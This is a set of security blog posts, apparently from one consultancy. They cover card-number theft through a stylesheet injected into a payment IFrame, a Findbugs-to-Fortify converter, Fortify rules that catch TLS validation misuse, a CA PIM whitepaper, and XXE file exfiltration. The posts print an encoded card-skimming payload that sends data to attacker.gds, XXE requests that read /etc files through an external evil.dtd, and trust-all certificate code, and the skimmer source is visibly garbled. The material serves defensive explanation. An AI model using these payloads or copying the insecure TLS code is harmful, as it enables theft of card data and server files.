The Perils of Implementing Secure Payment IFrames

Web applications that handle sensitive data, in particular card payment information, commonly use an embedded IFrame to provide users with a seamless customer experience. This IFrame (which may be provided from a third party payment service provider) should be served from a separate domain to leverage the browser same-origin policy controls. These controls prevent direct interaction between the consuming web application and the frame processing the payment details. For example, JavaScript executing within the business application cannot read cardholder details from within the embedded payment frame. This is a common justification for removing the application from the scope of PCI-DSS assessment leaving only the (possibly third party) IFrame that handles payment card data.

This method of segregating sites which handle card data from those that don’t can be effective provided some requirements are met. The first, as mentioned above, is that the business application and payment gateway should be served from completely different domains. It is important to note that subdomains should not be used unless the security implications are fully understood as, in some cases, the same origin policy can be bypassed by changing the “document.domain” value for the page. The second requirement is that no unvalidated data is passed from the business application to the payment IFrame. This is of critical importance because it may make it possible for an attacker to read data, such as the user’s Primary Account Number, from the payment IFrame if data controllable by an attacker is processed within the context of the payment domain.

While these concepts seem simple, this second requirement is one which bears closer inspection. Ensuring that data such as text supplied by the user is not passed to the payment IFrame is an obvious security control in this scenario. There are however other situations which are sometimes overlooked in which data could be passed into the payment IFrame. It is one such example, which GDS has encountered during security assessments, that we’ll examine below - stylesheets.

In many cases the source page for the payment IFrame is a generic site which handles payments for a large number of business applications, either within the same organisation or as a service to third parties. This page is unlikely to be styled the same way as the site which is using it, which may be an issue if it is important to reassure customers that they are dealing with a trustworthy retailer, or to present a consistent brand identity. To address this it is may be important to style the payment IFrame as if it is part of the business application in which it is embedded. This can be achieved by using images and CSS files which match those used by the business application, however this opens up a potential problem.

If the image or CSS files used to style the payment IFrame are imported directly from the business application site, then an attacker who gains control over the business application, or the server it resides on, may be able to insert malicious data into these files, and consequently into the payment IFrame. This compromises the security model used by the application to isolate sensitive data and potentially brings the entire business application into scope for assessment of card data handling.

To avoid this scenario it is therefore important to ensure that all external resources used by the IFrame are only loaded from trusted locations that are not controlled by the business application or its hosting system. Any resources provided by the application or application owners should be reviewed prior to being made available from the payment domain to ensure that they are suitable.

Example Attack

The following is an example of an attack which could be carried out using a compromised CSS file.

For demonstration purposes this is what the page looks like without the style applied, the borders of the IFrame are clearly visible.

When the style from the business application is applied the page looks like this, as you can see the IFrame, though still present, is not clearly visible.

The code to include the payment IFrame in the business application is as follows:

<iframe src=”https://payment-provider.gds:4443/customer_pan.html#css=https://business-application.gds/style.css” width=”600” height=”110” frameBorder=”0”>

As can be seen the payment site is hosted on a different domain and port from the business application. This means that the restrictions of the same origin policy will apply, however the payment IFrame loads the CSS file of the business application as shown below.

If an attacker were to gain control of the business application they could change the stylesheet to insert a malicious payload, the following example is JavaScript code to extract the customer’s PAN number when the “Next” button is clicked and send it to a remote attacker controlled location.

if(document.getElementById("stealer") == null) {
  var node=document.createElement("script");
  node.text='function steal() {' + 
    'if(window.XDomainRequest) {' +
      'xmlhttp = new XDomainRequest()' +
else if(window.XMLHttpRequest) {' + 'xmlhttp = new XMLHttpRequest()' +
else {' +
'xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")' +
+ '"GET",' +
'"https://attacker.gds:31337/index.html?pan="+' +
'document.getElementById("customerPan").value,' +
+ 'xmlhttp.send();' + 'document.getElementById("payment").submit()' + '};'; document.getElementsByTagName('head')[0].appendChild(node) } try { document.getElementById("next").outerHTML=
'<input id="next2" type="button" value="Next" ' +
' } catch(err) { }

Making this code execute from a CSS file can be achieved using CSS expressions. These trigger when any action is performed on the page so it is necessary to verify that any new elements have not been added already and to catch any errors which may occur when replacing elements.

The following code (an encoding of the above) can be added as the first line of the style sheet to execute this attack.

@import "data:,*%7bx:expression(eval(String.fromCharCode(105,
  102, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103,
  101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73,
  100, 40, 34, 115, 116, 101, 97, 108, 101, 114, 34, 41, 32,
  61, 61, 32, 110, 117, 108, 108, 41, 123, 118, 97, 114, 32,
  110, 111, 100, 101, 61, 100, 111, 99, 117, 109, 101, 110,
  116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109,
  101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41,
  59, 110, 111, 100, 101, 46, 115, 101, 116, 65, 116, 116,
  114, 105, 98, 117, 116, 101, 40, 34, 105, 100, 34, 44, 34,
  115, 116, 101, 97, 108, 101, 114, 34, 41, 59, 110, 111,
  100, 101, 46, 116, 101, 120, 116, 61, 39, 102, 117, 110,
  99, 116, 105, 111, 110, 32, 115, 116, 101, 97, 108, 40, 41,
  123, 105, 102, 40, 119, 105, 110, 100, 111, 119, 46, 88,
  68, 111, 109, 97, 105, 110, 82, 101, 113, 117, 101, 115,
  116, 41, 123, 120, 109, 108, 104, 116, 116, 112, 32, 61,
  32, 110, 101, 119, 32, 88, 68, 111, 109, 97, 105, 110, 82,
  101, 113, 117, 101, 115, 116, 40, 41, 125, 101, 108, 115,
  101, 32, 105, 102, 40, 119, 105, 110, 100, 111, 119, 46,
  88, 77, 76, 72, 116, 116, 112, 82, 101, 113, 117, 101, 115,
  116, 41, 123, 120, 109, 108, 104, 116, 116, 112, 32, 61,
  32, 110, 101, 119, 32, 88, 77, 76, 72, 116, 116, 112, 82,
  101, 113, 117, 101, 115, 116, 40, 41, 125, 101, 108, 115,
  101, 123, 120, 109, 108, 104, 116, 116, 112, 32, 61, 32,
  110, 101, 119, 32, 65, 99, 116, 105, 118, 101, 88, 79, 98,
  106, 101, 99, 116, 40, 34, 77, 105, 99, 114, 111, 115, 111,
  102, 116, 46, 88, 77, 76, 72, 84, 84, 80, 34, 41, 125, 59,
  120, 109, 108, 104, 116, 116, 112, 46, 111, 112, 101, 110,
  40, 34, 71, 69, 84, 34, 44, 34, 104, 116, 116, 112, 115,
  58, 47, 47, 97, 116, 116, 97, 99, 107, 101, 114, 46, 103,
  100, 115, 58, 51, 49, 51, 51, 55, 47, 105, 110, 100, 101,
  120, 46, 104, 116, 109, 108, 63, 112, 97, 110, 61, 34, 43,
  100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116,
  69, 108, 101, 109, 101, 110, 116, 66, 121, 73, 100, 40, 34,
  99, 117, 115, 116, 111, 109, 101, 114, 80, 97, 110, 34, 41,
  46, 118, 97, 108, 117, 101, 44, 102, 97, 108, 115, 101, 41,
  59, 120, 109, 108, 104, 116, 116, 112, 46, 115, 101, 110,
  100, 40, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46,
  103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121,
  73, 100, 40, 34, 112, 97, 121, 109, 101, 110, 116, 34, 41,
  46, 115, 117, 98, 109, 105, 116, 40, 41, 125, 59, 39, 59,
  100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116,
  69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97,
  103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41,
  91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105,
  108, 100, 40, 110, 111, 100, 101, 41, 125, 59, 116, 114,
  121, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103,
  101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73,
  100, 40, 34, 110, 101, 120, 116, 34, 41, 46, 111, 117, 116,
  101, 114, 72, 84, 77, 76, 61, 39, 60, 105, 110, 112, 117,
  116, 32, 105, 100, 61, 34, 110, 101, 120, 116, 50, 34, 32,
  116, 121, 112, 101, 61, 34, 98, 117, 116, 116, 111, 110,
  34, 32, 118, 97, 108, 117, 101, 61, 34, 78, 101, 120, 116,
  34, 32, 111, 110, 67, 108, 105, 99, 107, 61, 34, 115, 116,
  101, 97, 108, 40, 41, 34, 62, 39, 125, 99, 97, 116, 99,
  104, 40, 101, 114, 114, 41, 123, 125)))%7D";

The following screenshot shows the screen after the customer has entered their card number, for demonstration purposes other card details are not required by this form but could also be trivially captured by an attacker.

When the “Next” button is clicked the customer’s PAN is sent to the attacker and the form is submitted. To the user it appears that nothing unusual has occurred and the normal next screen of the payment process is shown.

However the customer’s PAN has already been received by the attacker as shown below.


There are some limitations to this particular attack, though there are other attacks which can be carried out which may not suffer the same limitations or which may work on other browsers. This implementation is limited to attacking users on Internet Explorer as it makes use of the CSS expression statement. This attack will also only normally work on Internet Explorer 7 and below, however Internet Explorer versions up to 10 (Windows 8.0), can be vulnerable. This is because Internet Explorer renders pages shown in an IFrame in the same compatibility mode as that of the parent frame. If an attacker controls the business application they can set the meta tag “<meta http-equiv=’X-UA-Compatible’ content=’IE=7’>” in the HTML header to force Internet Explorer 7 compatibility mode on the parent page, and therefore the payment provider page. In Internet Explorer 11 (Windows 7 if updated and Windows 8.1), CSS expressions are disabled for the “Internet” zone, therefore this attack would only work for sites in the “Local intranet” or “Trusted sites” zones for this version.


Converting Findbugs XML to HP Fortify SCA FPR

At GDS, we frequently encounter organizations with mature Secure Development Lifecycle (SDL) processes that have integrated HP Fortify to perform static code analysis. As discussed in our previous posting, GDS often assists organizations by developing custom security checks for security issues or insecure patterns identified after manual security code review. However there are languages that Fortify does not directly support, making it difficult to integrate code written in unsupported languages into an organization’s existing analysis framework.

Scala is an example of a language that is not supported by Fortify and therefore other static analysis tools must be used to perform security checks. In a previous blog post, we discussed how the Findbugs static analysis tool can be used to perform static analysis of Scala application bytecode. How can the Findbugs scan results be incorporated into an organization’s existing HP Fortify SSC server to manage the identified vulnerabilities? We have written a lightweight Java tool that can be used to convert a Findbugs XML report into a Fortify FPR file. This will allow the Findbugs results to be submitted to the SSC server as if scanned by HP Fortify SCA.

A Fortify FPR file is a compressed archive with a well-defined internal directory structure, as shown below:

Screen Shot 2015-05-29 at 10.55.05.png

The result of the SCA analysis is stored in the audit.fvdl file in an XML format. The tool we have developed takes a Findbugs XML report and transforms it into an FPR file.

The Findbugs XML is first merged with a messages.xml file that contains the finding descriptions and recommendations, using both the Findbugs bundled findings and the GDS-developed Scala ones. It is also possible to use a custom messages.xml as input. This is particularly useful for adding new write-ups for your own custom rules for Findbugs.

The merged file is then transformed to the FVDL data structure through an XSL Transformation.

The XSLT processor takes the XML source document, plus an XSLT stylesheet, and processes them to produce an output document.

This audit.fvdl file is then added to a pre-packaged zip archive with the other required files.

In doing so, the transformation is completely decoupled from the code, and it is only dependent on the used XSLT stylesheet, which can be modified without recompiling the tool.

The application is packaged in a single runnable jar and can be used as follows:

$ java -­jar convert2FPR.jar findbugs report.xml

To supply a custom messages.xml file, usage is as follows:

$ java -­jar convert2FPR.jar findbugs messages.xml report.xml

The output file, in both cases is ./report.fpr .

The first parameter (findbugs) represents the input format and maps to the corresponding XSL (see below Java example):



In order to extend the tool to support further input formats, only a new XSL file and one additional line in the above code for each added XSL stylesheet are required.

The source code and compiled tool can be found on our Github Repository below:


Fortify SCA Custom Rules for JSSE APIs Misuse

While delivering GDS secure SDLC services, we often develop a range of custom security checks and static analysis rules for detecting insecure coding patterns that we find during our source code security reviews. These patterns can represent both common security flaws or unique security weaknesses specific to either the application being assessed, its architecture/design, utilised components, or even the development team itself. These custom rules are often developed to target specific languages and be implemented within a specific static analysis tool depending on what our client is using already or most comfortable with - previous examples include FindBugs, PMD, Visual Studio and of course Fortify SCA.  

In this blog post I will be focusing on developing PoC rules for Fortify SCA to target Java based applications, however, the same concepts can easily be extended to other tools and/or development languages.

The recent vulnerability that affected Duo Mobile confirms the analysis of Georgiev et al, who demonstrate a wide range of serious security flaws are the result of an incorrect SSL/TLS certificate validation in various non-browser software, libraries and middleware.

Specifically, in this post we focus on how to identify an insecure use of the SSL/TLS APIs in Java, which could result in Man-in-the-Middle or spoofing attacks allowing a malicious host to impersonate a trusted one. The integration of HP Fortify SCA in the SDLC allows applications to be efficiently scanned for vulnerabilities on a regular basis. We found out that issues occurring due to SSL APIs misuse are not identified with the out of the box rule-sets, thus we developed a comprehensive 12 custom-rule pack for Fortify.

Secure Sockets Layer (SSL/TLS) is the most widely used protocol for secure communication over the web using cryptographic processes to provide authentication, confidentiality, and integrity. To ensure the identity of the party, X.509 certificates must be exchanged and verified. Once the parties are authenticated, the protocol provides an encrypted connection. The algorithms used for encryption in SSL include a secure hash function, which guarantees the integrity of the data.

When using SSL/TLS, the following two steps must be performed in order to ensure no man in the middle tampers with the channel:

  • Certificate Chain-Of-Trust verification: a X.509 certificate specifies the name of the certificate authority (CA) that issued the certificate. The server also sends to the client a list of certificates of the intermediate CA all the way to a root CA. The client verifies the signature, expiration (and other checks out of the scope of this post such as revocation, basic constraints, policy constraints, etc) of each certificate starting from the server’s certificate at the bottom going up to the root CA. If the algorithm reaches the last certificate in the chain, with no violations, then verification is successful.
  • Hostname Verification: after the chain of trust is established, the client must verify that the subject of the X.509 certificate matches the fully qualified DNS name of the requested server. RFC2818 prescribes to use SubjectAltNames and Common Name for backwards compatibility.

The following mis-use cases can occur when SSL/TLS APIs are not used securely and can cause an application to transmit sensitive information over a compromised SSL/TLS channel.

Trusting All Certificates

The application implements a custom TrustManager so that its logic will trust every presented server certificates without performing the Chain-Of-Trust verification.

TrustManager[] trustAllCerts = new TrustManager[] {
        new X509TrustManager() {
   	public void checkServerTrusted(X509Certificate[] certs, 
                 String authType){}

This case usually originates from development environments where self-signed Certificates are widely used. In our experiences, we commonly find developers disabling certificate validation altogether instead of loading the certificate into their keystore.This leads to this dangerous coding pattern accidentally making its way into production releases.

When this occurs, it is similar to removing the batteries from a smoke detector: the detector (validation) will still be there, providing a false sense of safety as it will not detect the smoke (un-trusted party). In fact, when a client connects to a server, the validation routine will happily accept any server certificate.

A search on GitHub for the above vulnerable code returns 13,823 results. Also on StackOverflow, a number of questions ask how to ignore certificate errors, obtaining replies similar to the above vulnerable code. It’s concerning that the most voted answers suggest to disable any trust management.

Allowing All Hostnames

The application does not check whether the digital certificate that the server sends is issued to the URL the client is connecting to.

The Java Secure Socket Extension (JSSE) provides two sets of APIs to establish secure communications, a high-level HttpsURLConnection API and a low-level SSLSocket API.

The HttpsURLConnection API performs hostname verification by default, again this can be disabled by overriding the verify() method in the corresponding HostnameVerifier class (there are around 12,800 results when searching for the below code on GitHub).

HostnameVerifier allHostsValid = new HostnameVerifier() {
public boolean verify(String hostname, SSLSession session) {
          	return true;

The SSLSocket API does not perform hostname verification out of the box. The below code is a Java 8 snippet, hostname verification is performed only if the endpoint identification algorithm is different from an empty String or a NULL value.

private void checkTrusted(X509Certificate[] chain, String authType, SSLEngine engine, boolean isClient) 
throws CertificateException{
  String identityAlg = engine.getSSLParameters().
  if (identityAlg != null && identityAlg.length() != 0) {
            checkIdentity(session, chain[0], identityAlg, isClient,

When SSL/TLS clients use the raw SSLSocketFactory instead of the HttpsURLConnection wrapper, the identification algorithm is set to NULL, thus the hostname verification is silently skipped. Thus, if the attacker has a MITM position on the network when a client connects to ‘’, the application will also accept a valid server certificate issued for ‘’.

This documented behavior is buried in the JSSE reference’s guide:

“When using raw SSLSocket and SSLEngine classes, you should always check the peer’s credentials before sending any data. The SSLSocket and SSLEngine classes do not automatically verify that the host name in a URL matches the host name in the peer’s credentials. An application could be exploited with URL spoofing if the host name is not verified.”

Our contribution: Fortify SCA Rules

To detect the above insecure usage we have coded the following checks in 12 custom rules for HP Fortify SCA. These rules identify issues in code relying on both JSSE and Apache HTTPClient since they are widely used libraries for thick clients and Android apps.

  • Over-Permissive Hostname Verifier: the rule is fired when the code declares a HostnameVerifier, and it always returns ‘true’.

Function f: is "verify" and f.enclosingClass.supers 
contains [Class: name=="" ] and 
f.parameters[0] is "java.lang.String" and 
f.parameters[1] is "" and is "boolean" and f contains 
[ReturnStatement r: r.expression.constantValue matches "true"] 
  • Over-Permissive Trust Manager: the rule is fired when the code declares a TrustManager and if it never throws a CertificateException. Throwing the exception is the way the API manages unexpected conditions.

Function f: is "checkServerTrusted" and 
f.parameters[0] is "" 
and f.parameters[1] is "java.lang.String" and is "void" and not f contains [ThrowStatement t: 
t.expression.type.definition.supers contains [Class: name == 
  • Missing Hostname Verification: the rule is fired when the code is using the Low-Level SSLSocket API and does not set a HostnameVerifier.

  • Often Misused: Custom HostnameVerifier: the rule is fired when the code is using the High-Level HttpsURLConnection API and it sets a Custom HostnameVerifier.

  • Often Misused: Custom SSLSocketFactory: the rule is fired when the code is using the High-Level HttpsURLConnection API and it sets a Custom SSLSocketFactory.

We decided to fire the “often misused” rules since the application is using the High-Level API and the overriding of these methods should be manually reviewed.

The rules pack is available on Github. These checks should always be performed during Source Code Analysis to ensure the code is not introducing an insecure SSL/TLS usage.

CA Privileged Identity Manager Security Research Whitepaper

Today we are announcing the release of our latest whitepaper that includes the results of a research project performed for CA Technologies earlier this year. The focus of the research was to determine the effectiveness of the security controls provided by the CA Privileged Identity Manager (CA PIM) solution against attacks that target privileged identities.  Privilege Identity Management is an approach for reducing risk and securing super user accounts. These accounts are required in every IT organization for performing system administrator tasks and the CA PIM solution aims to provide access and account management through a variety of security controls.

The CA PIM components that were considered in scope for the research project were the following:

  • Fine-Grained Access Controls – Layers access controls on top of the native operating system for protecting privileged accounts. In the event a privileged account is compromised, access to the compromised system is restricted.

  • Granular Audit Logging – Provides audit logging or tracking identity and actions of privileged accounts even in shared account scenarios. Combined with enforced fine-grained access controls, this is intended to help with early detection of privileged account compromise.

  • Application Jailing – Provides the ability to enforce fine-grained access controls on applications and processes. By limiting the system resources that can be accessed by an application, those resources are inaccessible to an attacker in the event a vulnerability is exploited, including previously unknown 0-day vulnerabilities.

The research performed included the following major activities:

  • Learning PIM and Initial Setup - The GDS Labs research team started with zero knowledge of the platform and learned about its features and capabilities through setting up common deployment scenarios, reviewing administrator guides, and receiving guidance from CA PIM product support. Additionally, profiling of the relevant agent processes was performed to identify system resources accessed, network communications, etc.

  • Threat and Countermeasure Enumeration - Research activities investigated how CA PIM can be deployed to mitigate common security threat vectors and attacks that target privileged users. The threats and attacks were narrowed to those relevant to the in-scope CA PIM components. Various CA PIM access control policies and configuration settings were identified as potential countermeasures.

  • Solution Mitigation Verification - Selected validation testing was performed to determine the resiliency of configured CA PIM policies against common bypass techniques and exploits relevant to fine-grained access controls. Additionally, CA PIM’s intercepting kernel agent architecture as well as sudo, shell wrapper, and proxy control architectures were compared and evaluated to determine their resiliency to the threats and attacks.

A penetration testing assessment of the product was not performed as part of this phase of the research project. Recommendations for improving the security posture of the product were provided to CA where relevant.

The whitepaper containing the results from our research can be downloaded from our Github page:



Automated Data Exfiltration with XXE

During a recent penetration test GDS assessed an interesting RESTful web service that lead to the development of a tool for automating the process of exploiting an XXE (XML External Entity) processing vulnerability to exfiltrate data from the compromised system’s file system. In this post we will have a look at a sample web service that creates user accounts in order to demonstrate the usefulness of the tool.

The example request below shows four parameters in the body of the HTTP request:

PUT /api/user HTTP/1.1
Content-Type: application/xml
Content-Length: 109


<?xml version=”1.0” encoding=”UTF-8” standalone=”yes”?>
<email>[email protected]</email>


The associated HTTP response contains the id of the created account in addition to the parameters supplied in the request:

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 10:57:28 GMT
Content-Type: application/xml
Content-Length: 557
Connection: keep-alive


    “userId”: 123,
    “firstname”: “John”,
    “surname”: “Doe”,
    “email”: “[email protected]”,
    “role”: “admin”


Note that the web service accepts JSON and XML input, which explains why the response is JSON encoded. Supporting multiple data formats is becoming more common and has been detailed by a recent blog post by Antti Rantasaari.

A typical proof of concept for XXE is to retrieve the content of /etc/passwd, but with some XML parsers it is also possible to get directory listings. The following request defines the external entity “xxe” to contain the directory listing for “/etc/tomcat7/”:

PUT /api/user HTTP/1.1
Content-Type: application/xml
Content-Length: 233


<?xml version=”1.0” encoding=”UTF-8” standalone=”yes”?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM “file:///etc/tomcat7/”>
    <email>[email protected]</email>


By referencing “&xxe;” in the surname element we should be able to see the directory listing in the response. Here it is:


HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 11:04:01 GMT
Content-Type: application/xml
Content-Length: 557
Connection: keep-alive


    “userId”: 126,
    “firstname”: “John”,
    “surname”: “Catalina\\ncontext.xml\\npolicy.d\nserver.xml\ntomcat-users.xml\nweb.xml\n”,
    “email”: “[email protected]”,
    “role”: “admin”


The Tool

Now that we can get directory listings and retrieve files the logical next step is to automate the process and download as many files as possible. The Python script linked below does exactly this. For example, we can mirror the directory “/etc/tomcat”:

# python /etc/tomcat7/
2015-04-24 16:21:10,650 [INFO    ] retrieving /etc/tomcat7/
2015-04-24 16:21:10,668 [INFO    ] retrieving /etc/tomcat7/Catalina/
2015-04-24 16:21:10,690 [INFO    ] retrieving /etc/tomcat7/Catalina/localhost/
2015-04-24 16:21:10,696 [INFO    ] looks like a file: /etc/tomcat7/Catalina/localhost/
2015-04-24 16:21:10,699 [INFO    ] saving etc/tomcat7/Catalina/localhost
2015-04-24 16:21:10,700 [INFO    ] retrieving /etc/tomcat7/
2015-04-24 16:21:10,711 [INFO    ] looks like a file: /etc/tomcat7/
2015-04-24 16:21:10,714 [INFO    ] saving etc/tomcat7/
2015-04-24 16:21:10,715 [INFO    ] retrieving /etc/tomcat7/context.xml/
2015-04-24 16:21:10,721 [INFO    ] looks like a file: /etc/tomcat7/context.xml/
2015-04-24 16:21:10,721 [INFO    ] saving etc/tomcat7/context.xml


Now we can grep through the mirrored files to look for passwords and other interesting information. For example, the file “/etc/tomcat7/context.xml” may contain database credentials:

<?xml version=”1.0” encoding=”UTF-8”?>
    <Resource name=”jdbc/myDB”


How it works

The XXE payload used in the above request effectively copies the content of the file into the “<surname>” tag. As a result invalid XML (e.g. a file containing unmatched angle brackets) leads to parsing errors. Moreover the application might ignore unexpected XML tags.

To overcome these limitations the file content can be encapsulated in a CDATA section (an approach adopted from a presentation by Timothy D. Morgan). With the following request, five entities are declared. The file content is loaded into “%file”, “%start” starts a CDATA section and “%end” closes it. Finally, “%dtd” loads a specially crafted dtd file, which defines the entity “xxe” by concatenating “%start”, “%file” and “%end”. This entity is then referenced in the “<surname>” tag.

PUT /api/user HTTP/1.1
Content-Type: application/xml
Content-Length: 378


<?xml version=”1.0” encoding=”UTF-8” standalone=”yes”?>
<!DOCTYPE updateProfile [
  <!ENTITY % file SYSTEM “file:///etc/tomcat7/context.xml”>
  <!ENTITY % start “<![CDATA[“>
  <!ENTITY % end “]]>”>
  <!ENTITY % dtd SYSTEM “”>
    <email>[email protected]</email>


This is the resource “evil.dtd” that is loaded from web server we control:

<!ENTITY xxe “%start;%file;%end;”>

The response actually contains the content of the configuration file “/etc/tomcat7/context.xml”.

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 11:12:43 GMT
Content-Type: application/xml
Content-Length: 557
Connection: keep-alive


    “userId”: 127,
    “firstname”: “John”,
    “surname”: “<?xml version=”1.0” encoding=”UTF-8”?>\n<Context>\n<Resource name=”jdbc/myDB” auth=”Container” type=”javax.sql.DataSource” username=”sqluser” password=”password” driverClassName=”com.mysql.jdbc.Driver” url=”jdbc:mysql://…”/>\n</Context>”,
    “email”: “[email protected]”,
    “role”: “admin”



Note that this technique only works if the server processing the XML input is allowed to make outbound connections to our server to fetch the file “evil.dtd”. Additionally, files containing ‘%’ (and in some cases ‘&’) signs or non-Unicode characters (e.g. bytes < 0x20) still result in a parsing error. Moreover, the sequence “]]>” causes problems because it terminates the CDATA section.

In the directory listing, there is no reliable way to distinguish between files and directories. The script assumes that files only contain alphanumerics, space and the following characters: “$.-_~”. Alternatively, we could also treat every file as a directory, iterate over its lines and try to download these possible files or subdirectories. However, this would result in too much overhead when encountering large files.

The script is tailored for the above example, but by changing the XML template and the “_parse_response()” method it should be fairly easy to adapt it for another target.

The script is available on GitHub:


One way to exploit XXE is to download files from the target server. Some parsers also return a directory listing. In this case we can use the presented script to recursively download whole directories. However, there are restrictions on the file content because certain characters can break the XML syntax.